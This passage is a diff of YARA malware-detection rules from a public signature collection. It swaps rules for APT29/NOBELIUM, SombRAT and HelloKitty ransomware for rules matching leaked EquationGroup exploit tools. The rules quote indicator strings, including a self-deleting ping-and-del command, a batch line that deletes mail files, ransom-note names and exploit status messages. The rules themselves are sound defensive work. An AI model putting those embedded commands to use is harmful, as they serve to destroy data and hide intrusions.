+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1731-L1747"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a02fd6fcd7423781bbd2e4458bd61d28e16a5b1a73b1682e63db5c86d53c7da4"
-		score = 85
+		logic_hash = "c5978d8cbffde2339cadd84f44d1df24e76f298a2f05bd9a6565246bfae1b1e3"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dc1ddad7e8801b5e37748ec40531a105ba359654ffe8bdb069bd29fb0b5afd94"
+		hash2 = "97af543cf1fb59d21ba5ec6cb2f88c8c79c835f19c8f659057d2f58c321a0ad4"
 
 	strings:
-		$s1 = "\\SystemCertificates\\Lib\\CertPKIProvider.dll" ascii
-		$s2 = "rundll32.exe %s %s" ascii fullword
-		$s3 = "eglGetConfigs" ascii fullword
-		$op1 = { 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 33 db 89 5d fc }
-		$op2 = { 8b 46 18 e9 30 ff ff ff 90 87 2f 00 10 90 2f 00 10 }
-		$op3 = { e8 14 dd ff ff 8b f1 80 3d 74 8c 01 10 00 0f 85 96 00 00 00 33 c0 40 b9 6c 8c 01 10 87 01 }
+		$x1 = "[-] %s - Target might not be in a usable state." fullword ascii
+		$x2 = "[*] Exploiting Target" fullword ascii
+		$x3 = "[-] Encoding Exploit Payload failed!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 3 of them or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Boombox_May21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwingtouch_1_0_4 : FILE
 {
 	meta:
-		description = "Detects BoomBox malware used by APT29 / NOBELIUM"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a4144c00-48b2-5520-b773-5d0a5de95fb1"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L206-L234"
+		id = "87e46fcd-d3e5-506a-97f3-8a18a7ba8042"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1749-L1763"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2a3829e704af2464639d07e8e7952669281e20cf2a7ac487d5d1eee021d08b35"
+		logic_hash = "4707dbbb302b9b2192bdd23e4b64e25b5b2f49c3dd7951905a07cb5b54d524d9"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec"
-		hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27"
-		hash3 = "cf1d992f776421f72eabc31d5afc2f2067ae856f1c9c1d6dc643a67cb9349d8c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "46da99d80fc3eae5d1d5ab2da02ed7e61416e1eafeb23f37b180c46e9eff8a1c"
 
 	strings:
-		$x1 = "\\Microsoft\\NativeCache\\NativeCacheSvc.dll" wide
-		$x2 = "\\NativeCacheSvc.dll _configNativeCache" wide
-		$a1 = "/content.dropboxapi.com" wide fullword
-		$s1 = "rundll32.exe {0} {1}" wide fullword
-		$s2 = "\\\\CertPKIProvider.dll" wide
-		$s3 = "/tmp/readme.pdf" wide
-		$s4 = "temp/[^\"]*)\"" wide fullword
-		$op1 = { 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 01 2f 4f 00 72 00 }
-		$op2 = { 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 }
-		$op3 = { 4d 05 20 00 12 80 91 04 20 01 08 0e 04 20 00 12 }
+		$x1 = "[-] The target is NOT vulnerable" fullword ascii
+		$x2 = "[+] The target IS VULNERABLE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and 3 of them or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Iistouch_1_2_2 : FILE
 {
 	meta:
-		description = "Detects malware used by APT29 / NOBELIUM"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b1462b4b-227f-5aeb-92ea-bda6a86831c7"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L236-L252"
+		id = "dd6ea8cc-505d-5c7c-a7ea-c5fa4f14b5ee"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1765-L1779"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18a52f5fd71455b8564d4b485c233dd358a304bfddc5e6fb604b8e5a2a1949a3"
+		logic_hash = "f4f5e17d3777d6ae8bfd0646eeffcd631331e4d8966f5124ebc9352438dc790f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "292e5b0a12fea4ff3fc02e1f98b7a370f88152ce71fe62670dd2f5edfaab2ff8"
-		hash2 = "776014a63bf3cc7034bd5b6a9c36c75a930b59182fe232535bb7a305e539967b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c433507d393a8aa270576790acb3e995e22f4ded886eb9377116012e247a07c6"
 
 	strings:
-		$op1 = { 48 03 c8 42 0f b6 04 21 88 03 0f b6 43 01 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
-		$op2 = { 48 03 c8 42 0f b6 04 21 88 43 01 41 0f b6 c7 8b c8 83 e0 0f 48 83 e1 f0 48 03 c8 }
-		$op3 = { 45 0f b6 43 ff 41 8b c2 99 44 88 03 41 0f b6 2b 83 e2 03 03 c2 40 88 6b 01 }
+		$x1 = "[-] Are you being redirectect? Need to retarget?" fullword ascii
+		$x2 = "[+] IIS Target OS: %s" fullword ascii
 
 	condition:
-		filesize < 2200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 60KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Stageless_Loader_May21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Namedpipetouch_2_0_0 : FILE
 {
 	meta:
-		description = "Detects stageless loader as used by APT29 / NOBELIUM"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7b83d327-52fc-5401-ae35-00f6b825678a"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L254-L276"
+		id = "0a5519d7-9811-5159-8df2-0cb2995d5085"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1781-L1800"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "850f6a1ad342fd5e4bb29c7bf90a032ddd8ac9d2eac5ffcbedf43e4d04b178f5"
+		logic_hash = "63d4395db4672b7a146dbd285e42344fb895b38f67fa9f7885b73855d7211190"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a4f1f09a2b9bc87de90891da6c0fca28e2f88fd67034648060cef9862af9a3bf"
-		hash2 = "c4ff632696ec6e406388e1d42421b3cd3b5f79dcb2df67e2022d961d5f5a9e78"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cb5849fcbc473c7df886828d225293ffbd8ee58e221d03b840fd212baeda6e89"
+		hash2 = "043d1c9aae6be65f06ab6f0b923e173a96b536cf84e57bfd7eeb9034cd1df8ea"
 
 	strings:
-		$x1 = "DLL_stageless.dll" ascii fullword
-		$s1 = "c:\\users\\devuser\\documents" ascii fullword nocase
-		$s2 = "VisualServiceComponent" ascii fullword
-		$s3 = "CheckUpdteFrameJavaCurrentVersion" ascii fullword
-		$op1 = { a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 }
-		$op2 = { ff d6 33 05 00 ?0 0? 10 68 d8 d4 00 10 57 a3 d? 6? 04 10 ff d6 33 05 00 ?0 0? 10 68 e8 d4 00 10 }
+		$s1 = "[*] Summary: %d pipes found" fullword ascii
+		$s3 = "[+] Testing %d pipes" fullword ascii
+		$s6 = "[-] Error on SMB startup, aborting" fullword ascii
+		$s12 = "92a761c29b946aa458876ff78375e0e28bc8acb0" fullword ascii
+		$op1 = { 68 10 10 40 00 56 e8 e1 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of them or 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Easybee_1_0_1 : FILE
 {
 	meta:
-		description = "Detects malware used by APT29 / NOBELIUM"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "89cb6884-4242-5b5a-b0ac-b31041dd261c"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L278-L300"
+		id = "f170ed34-f7d1-5eb2-9400-4308b6b39388"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1802-L1816"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "472acd1d6daf3480de59ecd3fa038d644e339dcc979cf7e56617eadc6cb32dc5"
+		logic_hash = "e3488a1d686b9ad468553cfe2c939e70ea6b9a21409df8b06bb54418495576ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "2a352380d61e89c89f03f4008044241a38751284995d000c73acf9cad38b989e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "59c17d6cb564edd32c770cd56b5026e4797cf9169ff549735021053268b31611"
 
 	strings:
-		$s1 = "Win32Project1.dll" ascii fullword
-		$op1 = { 59 c3 6a 08 68 70 5e 01 10 e8 d2 8c ff ff 8b 7d 08 8b c7 c1 f8 05 }
-		$op2 = { 8d 4d f0 e8 c4 12 00 00 68 64 5b 01 10 8d 45 f0 c7 45 f0 6c 01 01 10 50 e8 ea 13 00 00 cc }
-		$op4 = { 40 c3 8b 65 e8 e8 a6 86 ff ff cc 6a 0c 68 88 60 01 10 e8 b0 4d ff ff }
-		$xc1 = { 25 73 25 73 00 00 00 00 2F 65 2C 20 00 00 00 00
-               43 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00
-               77 00 73 00 5C 00 65 00 78 00 70 00 6C 00 6F 00
-               72 00 65 00 72 00 2E 00 65 00 78 00 65 }
+		$x1 = "@@for /f \"delims=\" %%i in ('findstr /smc:\"%s\" *.msg') do if not \"%%MsgFile1%%\"==\"%%i\" del /f \"%%i\"" fullword ascii
+		$x2 = "Logging out of WebAdmin (as target account)" fullword ascii
 
 	condition:
-		filesize < 3000KB and ( $xc1 or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT29_NOBELIUM_Malware_May21_4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Regread_1_1_1 : FILE
 {
 	meta:
-		description = "Detects malware used by APT29 / NOBELIUM"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "56193475-52b4-5720-abc5-72249e2a0c37"
-		date = "2021-05-29"
-		modified = "2025-03-21"
-		reference = "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_nobelium_may21.yar#L302-L323"
+		id = "99a2b146-a277-5917-9a84-3d396d2c8bf9"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1818-L1832"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7d5858cc6dab094d5dceab75a2002d9145537008241a08ac7bd399c9d6e6c270"
+		logic_hash = "5bf833d7fb073ad74037cf6df4729c75d50641a46a962aee8deac19e31b74419"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
 
 	strings:
-		$s1 = "KM.FileSystem.dll" ascii fullword
-		$op1 = { 80 3d 50 6b 04 10 00 0f 85 96 00 00 00 33 c0 40 b9 48 6b 04 10 87 01 33 db 89 5d fc }
-		$op2 = { c3 33 c0 b9 7c 6f 04 10 40 87 01 c3 8b ff 55 }
-		$op3 = { 8d 4d f4 e8 53 ff ff ff 68 d0 22 01 10 8d 45 f4 50 e8 d8 05 00 00 cc 8b 41 04 }
-		$xc1 = { 2E 64 6C 6C 00 00 00 00 41 53 4B 4F 44 00 00 00
-               53 75 63 63 65 73 73 }
+		$s1 = "[+] Connected to the Registry Service" fullword ascii
+		$s2 = "f08d49ac41d1023d9d462d58af51414daff95a6a" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( $xc1 or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_UNC2447_MAL_SOMBRAT_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Englishmansdentist_1_2_0 : FILE
 {
 	meta:
-		description = "Detects SombRAT samples from UNC2447 campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "78b46bed-4fd4-596f-bba7-12243f467af3"
-		date = "2021-05-01"
-		modified = "2023-01-07"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L2-L36"
+		id = "76367c53-9b48-59a1-9ac9-8649fd833fe3"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1834-L1848"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f2572745cbd68c5f2be5c64b160d2513938daba6da57523012491acc63cfee4"
+		logic_hash = "cd415731c1c8398d2b0b1758c4e7eb3e708620b269f9312cf0a750ab2099162e"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "61e286c62e556ac79b01c17357176e58efb67d86c5d17407e128094c3151f7f9"
-		hash2 = "99baffcd7a6b939b72c99af7c1e88523a50053ab966a079d9bf268aff884426e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a6ab28885ad7d5d64ac4c4fb8c619eca3b7fb3be883fc67c90f3ea9251f34c6"
 
 	strings:
-		$x1 = "~arungvc" ascii fullword
-		$s1 = "plugin64_" ascii
-		$s2 = "0xUnknown" ascii fullword
-		$s3 = "b%x.%s" ascii fullword
-		$s4 = "/news" ascii
-		$sc1 = { 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 73
-               00 2E 00 65 00 78 00 65 00 00 00 00 00 00 00 00
-               00 49 73 57 6F 77 36 34 50 72 6F 63 65 73 73 00
-               00 6B 00 65 00 72 00 6E 00 65 00 6C 00 33 00 32
-               00 00 00 00 00 00 00 00 00 47 00 6C 00 6F 00 62
-               00 61 00 6C 00 5C 00 25 00 73 }
-		$op1 = { 66 90 0f b6 45 80 32 44 0d 81 34 de 88 44 0d 81 48 ff c1 48 83 f9 19 72 e9 }
-		$op2 = { 48 8b d0 66 0f 6f 05 ?1 ?? 0? 00 f3 0f 7f 44 24 68 66 89 7c 24 58 41 b8 10 00 00 00 4c 39 40 10 4c 0f 42 40 10 48 83 78 18 08 }
-		$op3 = { 49 f7 b0 a0 00 00 00 42 0f b6 04 0a 41 30 44 33 fe 48 83 79 18 10 72 03 48 8b 09 33 d2 b8 05 00 00 00 }
+		$x1 = "[+] CheckCredentials(): Checking to see if valid username/password" fullword ascii
+		$x2 = "Error connecting to target, TbMakeSocket() %s:%d." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them ) or 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch : FILE
 {
 	meta:
-		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c84b2430-dcf1-5a80-96a0-02d292ea386b"
-		date = "2021-05-01"
+		id = "df3b0794-cbbd-530c-8425-fdf4b116b870"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L38-L72"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1850-L1870"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "acc0ab5502d53c6e22c8650c29c5459a6106f33c398e4efcd963f54971a0c870"
+		logic_hash = "faeac75104a15cac8528663a82eadbc7bc22cc0a1d1a3b3dfccb6ea46fb24a67"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851"
-		hash2 = "0e5f7737704c8f25b2b8157561be54a463057cd4d79c7e016c30a1cf6590a85c"
-		hash3 = "52dace403e8f9b4f7ea20c0c3565fa11b6953b404a7d49d63af237a57b36fd2a"
-		hash4 = "7be901c5f7ffeb8f99e4f5813c259d0227335680380ed06df03fb836a041cb06"
-		hash5 = "947e357bfdfe411be6c97af6559fd1cdc5c9d6f5cea122bf174d124ee03d2de8"
-		hash6 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
-		hash7 = "a147945635d5bd0fa832c9b55bc3ebcea7a7787e8f89b98a44279f8eddda2a77"
-		hash8 = "bade05a30aba181ffbe4325c1ba6c76ef9e02cbe41a4190bd3671152c51c4a7b"
-		hash9 = "c2498845ed4b287fd0f95528926c8ee620ef0cbb5b27865b2007d6379ffe4323"
-		hash10 = "dc007e71085297883ca68a919e37687427b7e6db0c24ca014c148f226d8dd98f"
-		hash11 = "ef614b456ca4eaa8156a895f450577600ad41bd553b4512ae6abf3fb8b5eb04e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
+		hash2 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
+		hash3 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
 
 	strings:
-		$xop1 = { 8b 45 08 8b 75 f4 fe 85 f7 fd ff ff 0f 11 44 05 b4 83 c0 10 89 45 08 83 f8 30 7c 82 }
-		$xop2 = { 81 c3 dc a9 b0 5c c1 c9 0b 33 c8 89 55 a0 8b c7 8b 7d e0 c1 c8 06 33 f7 }
-		$s1 = "select * from Win32_ShadowCopy" wide fullword
-		$s2 = "bootfont.bin" wide fullword
-		$s3 = "DECRYPT_NOTE.txt" wide fullword
-		$s4 = ".onion" wide
-		$sop1 = { 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 0f 11 45 ec }
-		$sop2 = { 56 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 }
-		$sop3 = { 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 }
+		$s1 = "NtErrorMoreProcessingRequired" fullword ascii
+		$s2 = "Command Format Error: Error=%x" fullword ascii
+		$s3 = "NtErrorPasswordRestriction" fullword ascii
+		$op0 = { 8a 85 58 ff ff ff 88 43 4d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of ( $x* ) or 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 2 of them )
 }
-rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eternalromance_2 : FILE
 {
 	meta:
-		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "82aaabc6-102a-512e-8c2a-4d6fda864c68"
-		date = "2021-05-01"
+		id = "40066023-ede9-5669-8b4d-a26a693d8818"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L74-L99"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1872-L1889"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1eee3a00ab3f70425d2b6bf5dc507155bf504b851ddb6515602d83d8b6a254b8"
+		logic_hash = "481a08bc73ac66245c0712599a61cccdf5127276a09a67cf894f76b7763c5c9b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768"
-		hash2 = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9"
-		hash3 = "501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe"
-		hash4 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f1ae9fdbb660aae3421fd3e5b626c1e537d8e9ee2f9cd6d56cb70b6878eaca5d"
+		hash2 = "b99c3cc1acbb085c9a895a8c3510f6daaf31f0d2d9ccb8477c7fb7119376f57b"
+		hash3 = "92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34"
 
 	strings:
-		$xop1 = { 50 8d 45 f8 50 ff 75 fc ff 15 ?? ?? 42 00 3d ea 00 00 00 75 18 83 7d f8 00 }
-		$s1 = "HelloKittyMutex" wide
-		$s2 = "%s\\read_me_lkd.txt" wide fullword
-		$s3 = "/C ping 127.0.0.1 & del %s" wide fullword
-		$s4 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword
-		$sop1 = { 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc ff 15 ?? ?? 42 00 }
-		$sop2 = { 74 12 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc }
+		$x1 = "[+] Backdoor shellcode written" fullword ascii
+		$x2 = "[*] Attempting exploit method %d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) or 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_UNC2447_PS1_WARPRISM_May21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Emphasismine : FILE
 {
 	meta:
-		description = "Detects WARPRISM PowerShell samples from UNC2447 campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fa389a45-3b31-5a84-9882-49fd6ee8cac5"
-		date = "2021-05-01"
+		id = "cc684f39-4971-52e0-b5ec-d28c7ce7032b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L101-L119"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1891-L1910"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "09abac2be0f12d31dabfdae9e8a148a28887a2a5df003c7bcb56ba45f1c6a62c"
+		logic_hash = "20ec32f5e9e439fb212985d5ae104ae5742231f594423cd125a9e64ed6eb234a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
-		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
-		hash3 = "b41a303a4caa71fa260dd601a796033d8bfebcaa6bd9dfd7ad956fac5229a735"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "dcaf91bd4af7cc7d1fb24b5292be4e99c7adf4147892f6b3b909d1d84dd4e45b"
+		hash2 = "348eb0a6592fcf9da816f4f7fc134bcae1b61c880d7574f4e19398c4ea467f26"
 
 	strings:
